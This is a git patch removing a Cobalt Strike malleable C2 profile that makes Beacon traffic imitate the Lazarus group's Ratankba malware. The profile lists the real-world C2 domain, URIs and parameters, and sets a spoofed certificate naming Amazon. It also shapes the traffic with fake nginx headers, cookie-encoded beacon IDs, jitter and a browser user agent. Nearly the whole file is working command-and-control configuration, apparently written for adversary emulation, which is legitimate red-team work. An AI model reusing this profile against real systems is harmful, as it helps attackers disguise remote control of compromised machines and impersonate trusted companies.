From 0afe493e70fb99b64a663004c5a1323a61e16ed7 Mon Sep 17 00:00:00 2001
From: xx0hcd <xx0hcd@gmail.com>
Date: Mon, 10 Apr 2017 10:24:09 -0500
Subject: [PATCH] Delete ratankba.profile

---
 ratankba.profile | 116 -----------------------------------------------
 1 file changed, 116 deletions(-)
 delete mode 100644 ratankba.profile

diff --git a/ratankba.profile b/ratankba.profile
deleted file mode 100644
index 8476211..0000000
--- a/ratankba.profile
+++ /dev/null
@@ -1,116 +0,0 @@
-#ratankba malware used by 'lazarus group'
-#xx0hcd
-#IOC's:
-#C2 = www.eye-watch.in
-#C2 URI's = '/jscroll/board/list.jpg', '/design/dfbox/list.jpg', and '/design/img/list.jpg'
-#C2 params = 'u=' and coresponding command string (here we use Beacon comms instead) (listed all param info from docs though only used two)
-#C2 param1 = '?action=What&u=<string>' -- action to perform
-#C2 param2 = '?action=CmdRes&u=<string>&err=kill' -- result of command error code
-#C2 param3 = '?action=CmdRes&u=<string>&err=exec' -- result of command return code
-#C2 param4 = '?action=BaseInfo&u=<string>' -- basic information collected
-
-#openssl to be realistic as possible
-https-certificate {
-    set CN       "eye-watch.in";
-    set O        "Amazon";
-    set C        "US";
-    set L        "Scottsdale";
-    set OU       "Starfield Class";
-    set ST       "Arizona";
-    set validity "365";
-}
-
-set sleeptime "30000";
-set jitter    "20";
-set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0";
-set dns_idle "8.8.8.8";
-set maxdns    "235";
-
-http-get {
-
-    set uri "/jscroll/board/list.jpg /design/dfbox/list.jpg /design/img/list.jpg";
-    
-    client {
-
-        header "Host" "www.eye-watch.in";
-        header "Accept" "*/*";
-	header "Cookie" "0449651003fe48-Nff0eb7";
-        parameter "action" "What";
-        
-        metadata {
-            netbios;
-            parameter "u";
-
-        }
-
-
-
-    }
-
-    server {
-
-        header "Cache-Control" "private, max-age=0";
-        header "Content-Type" "text/html; charset=utf-8";
-        header "Server" "nginx/1.4.6 (Ubuntu)";
-        header "Connection" "close";
-        
-
-        output {
-            netbios;
-            print;
-        }
-    }
-}
-
-http-post {
-    
-    set uri "/jscroll/board/List.jpg /design/dfbox/List.jpg /design/img/List.jpg";
-    set verb "GET";
-
-    client {
-
-        header "Host" "www.eye-watch.in";
-        header "Accept" "*/*";
-        parameter "action" "BaseInfo";
-        
-        output {
-            netbios;
-            parameter "u";
-
-
-        }
-        
-        parameter "err" "kill";
-        
-        id {
-            base64url;
-	    prepend "0449651003fe48-";
-	    header "Cookie";
-
-        }
-    }
-
-    server {
-
-        header "Cache-Control" "private, max-age=0";
-        header "Content-Type" "text/html; charset=utf-8";
-        header "Server" "nginx/1.4.6 (Ubuntu)";
-        header "Connection" "close";
-        
-
-        output {
-            netbios;
-            print;
-        }
-    }
-}
-
-http-stager {
-    server {
-        header "Cache-Control" "private, max-age=0";
-        header "Content-Type" "text/html; charset=utf-8";
-        header "Server" "nginx/1.4.6 (Ubuntu)";
-        header "Connection" "close";
-    }
-}
-